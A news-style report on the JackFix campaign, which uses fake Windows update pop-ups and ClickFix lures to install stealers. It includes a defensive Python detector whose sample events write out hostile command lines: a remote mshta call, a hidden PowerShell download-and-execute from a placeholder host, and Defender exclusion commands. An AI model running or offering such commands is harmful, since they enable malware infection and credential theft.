JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers

A newly documented malware campaign, dubbed JackFix, tricks users into installing malware through fake Windows update pop-ups shown on adult websites. The attackers use ClickFix-style lures to talk victims into running the malicious commands themselves.

The lure pages are clones of adult sites such as xHamster and PornHub, and traffic to them is often driven by malvertising. Framing the prompt as an “urgent security update” puts the victim under time pressure, which makes them more likely to follow the instructions without questioning them.

ClickFix-style attacks have risen sharply. They trick users into executing harmful commands under the guise of a technical fix or a CAPTCHA verification step. According to Microsoft’s own reporting, ClickFix is now the most common initial access method, accounting for 47% of attacks.

The fake Windows update alert takes over the entire screen and instructs the victim to open the Windows Run dialog (Win+R), paste a command, and press Enter, which starts the infection chain. The source of some of the lure sites still contains developer comments written in Russian.

The ClickFix code on the page is heavily obfuscated and tries to stop the user from leaving the full-screen alert. The blocking logic is flawed, however: pressing Escape or F11 still closes the pop-up.

The pasted command invokes the legitimate mshta.exe binary (a signed Windows component that executes HTML Applications) against an attacker-controlled URL. The HTA it loads contains JavaScript that runs a PowerShell command, which in turn retrieves a second PowerShell script from a remote server. The hosting domains are set up so that anyone who simply browses to them in a web browser is redirected to a benign site such as Google or Steam, which hampers casual inspection of the payload URLs.

The downloaded PowerShell script is also heavily obfuscated and includes anti-analysis mechanisms. It attempts to elevate privileges by relaunching itself with the Start-Process cmdlet and “-Verb RunAs”, which triggers a User Account Control prompt the victim is expected to accept, and it then adds Microsoft Defender Antivirus exclusions for the command-and-control (C2) addresses and for the directories where the payloads are staged.
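The chain described in the last two paragraphs leaves a recognisable trail in endpoint telemetry: explorer.exe (the Run dialog) starting mshta.exe with a URL argument, PowerShell descending from mshta.exe, a Start-Process -Verb RunAs relaunch, and Add-MpPreference exclusions that Defender itself records as Event ID 5007 configuration changes. The following detection sketch is an added example written for this page, not code from Acronis or from the JackFix campaign; the event records are constructed in a Sysmon-like shape, and every hostname, path and IP address in them is hypothetical.

```python
"""Score Windows endpoint events for a JackFix/ClickFix-style chain.

Added example, not code from the JackFix write-up. Event dicts mimic Sysmon
Event ID 1 (process creation) and Defender Event ID 5007 (configuration
changed); all hosts, paths and addresses below are hypothetical.
"""
import ntpath
import re

URL_RE = re.compile(r"""https?://[^\s'"]+""", re.I)
RUNAS_RE = re.compile(r"-verb\s+runas\b", re.I)
# Add-MpPreference -ExclusionPath <value> (and the Process/IpAddress/Extension forms)
EXCL_CMD_RE = re.compile(r"""-Exclusion(Path|Process|IpAddress|Extension)\s+([^\s"']+)""", re.I)
# The "New value:" line Defender writes to Event ID 5007 when an exclusion is added
EXCL_EVT_RE = re.compile(r"Exclusions\\(Paths|Processes|IpAddresses|Extensions)\\(.+?)\s*=", re.I)
SHELLS = {"powershell.exe", "pwsh.exe"}


def lineage(pid, by_pid, limit=16):
    """Image names from the oldest known ancestor down to pid (bounded, loop-safe)."""
    names, seen = [], set()
    while pid in by_pid and pid not in seen and len(names) < limit:
        seen.add(pid)
        names.append(ntpath.basename(by_pid[pid]["image"]).lower())
        pid = by_pid[pid]["ppid"]
    return list(reversed(names))


def analyze(events):
    """Return {"verdict", "score", "findings"}; each finding is (kind, context, detail)."""
    procs = [e for e in events if e["id"] == 1]
    by_pid = {e["pid"]: e for e in procs}
    findings, score = [], 0
    for e in procs:
        image = ntpath.basename(e["image"]).lower()
        cmd = e["cmdline"]
        chain = lineage(e["pid"], by_pid)
        context = " > ".join(chain)
        url = URL_RE.search(cmd)
        if image == "mshta.exe" and url:                    # mshta fetching a remote HTA
            score += 3
            findings.append(("mshta_remote_url", context, url.group(0)))
        if image in SHELLS and "mshta.exe" in chain[:-1]:   # PowerShell descended from mshta
            score += 3
            findings.append(("powershell_under_mshta", context, cmd[:60]))
        if image in SHELLS and RUNAS_RE.search(cmd):        # self-elevation via a UAC prompt
            score += 2
            findings.append(("self_elevation_runas", context, cmd[:60]))
        if "add-mppreference" in cmd.lower():               # AV exclusions from the command line
            for kind, value in EXCL_CMD_RE.findall(cmd):
                score += 3
                findings.append(("defender_exclusion_" + kind.lower(), context, value))
    for e in events:
        if e["id"] == 5007:                                 # Defender's own record of the change
            for kind, value in EXCL_EVT_RE.findall(e["message"]):
                score += 3
                findings.append(("defender_5007_" + kind.lower(), "Defender", value))
    kinds = {f[0] for f in findings}
    if {"mshta_remote_url", "powershell_under_mshta"} <= kinds:
        verdict = "clickfix_chain"
    elif score >= 3:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "score": score, "findings": findings}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed sample; hostnames, paths and IPs are placeholders
    {"id": 1, "pid": 1000, "ppid": 400, "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\explorer.exe"},
    # Run dialog -> mshta with a remote URL (the pasted ClickFix command)
    {"id": 1, "pid": 2000, "ppid": 1000, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" https://update-check.example/v'},
    # The HTA's JavaScript spawns PowerShell to fetch the second stage
    {"id": 1, "pid": 3000, "ppid": 2000, "image": PS,
     "cmdline": r'powershell.exe -w hidden -c "iex (iwr https://update-check.example/s.ps1)"'},
    # Second stage relaunches itself elevated
    {"id": 1, "pid": 3001, "ppid": 3000, "image": PS,
     "cmdline": r'''powershell.exe -c "Start-Process powershell.exe -Verb RunAs -ArgumentList '-f C:\Users\Public\Libraries\s.ps1'"'''},
    # Elevated instance carves out Defender exclusions for the C2 address and staging directory
    {"id": 1, "pid": 4000, "ppid": 3001, "image": PS,
     "cmdline": r'powershell.exe -c "Add-MpPreference -ExclusionPath C:\Users\Public\Libraries -ExclusionIpAddress 203.0.113.10"'},
    # Benign noise: a local HTA and an interactive PowerShell, both started from explorer
    {"id": 1, "pid": 5000, "ppid": 1000, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Windows\Help\local.hta"},
    {"id": 1, "pid": 5100, "ppid": 1000, "image": PS, "cmdline": "powershell.exe -c Get-Date"},
    {"id": 5007, "message": r"Windows Defender Antivirus Configuration has changed. "
                            r"Old value:  New value: HKLM\SOFTWARE\Microsoft\Windows Defender"
                            r"\Exclusions\Paths\C:\Users\Public\Libraries = 0x0"},
]

if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    print(result["verdict"], result["score"])
    for kind, context, detail in result["findings"]:
        print(f"  {kind:28} {context:60} {detail}")
```

Run as-is, the script scores the embedded sample as a ClickFix chain; in production the same logic would be fed by Sysmon Event ID 1 records and the Microsoft-Windows-Windows Defender/Operational log. A local mshta.exe invocation without a URL is deliberately not flagged on its own, because legitimate HTA use still exists; the signal is the combination of a remote HTA, PowerShell underneath it, a UAC relaunch, and exclusions appearing right afterwards.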

If that succeeds, the script drops several payloads, including simple remote access trojans (RATs) that call back to a C2 server, presumably to fetch further malware. Acronis described this as “the most egregious example of spray and pray,” with up to eight different payloads observed.

These include Rhadamanthys Stealer, Vidar Stealer 2.0, RedLine Stealer, and Amadey, as well as other, unnamed loaders and RATs. Even if only one of these payloads runs successfully, the victim risks losing passwords, cryptocurrency wallets, and other data, and the foothold can be used to escalate the attack further.

The advanced tactics of JackFix, deploying fake pop-ups and obfuscated scripts, reflect a persistent trend in cybercrime. Attackers constantly refine their evasion techniques across diverse platforms.

This ingenuity extends to mobile threats, where malicious Android applications now employ AI-powered obfuscation. These apps mimic legitimate services, stealing data while operating undetected.

Such strategies underscore how threat actors leverage cutting-edge techniques, from social engineering to artificial intelligence. Their aim is to maximize impact and bypass modern security defenses.

The relentless evolution of these attack vectors calls for constant vigilance, and the use of AI-driven obfuscation by malware developers has been documented in a separate report on AI-based obfuscated malware.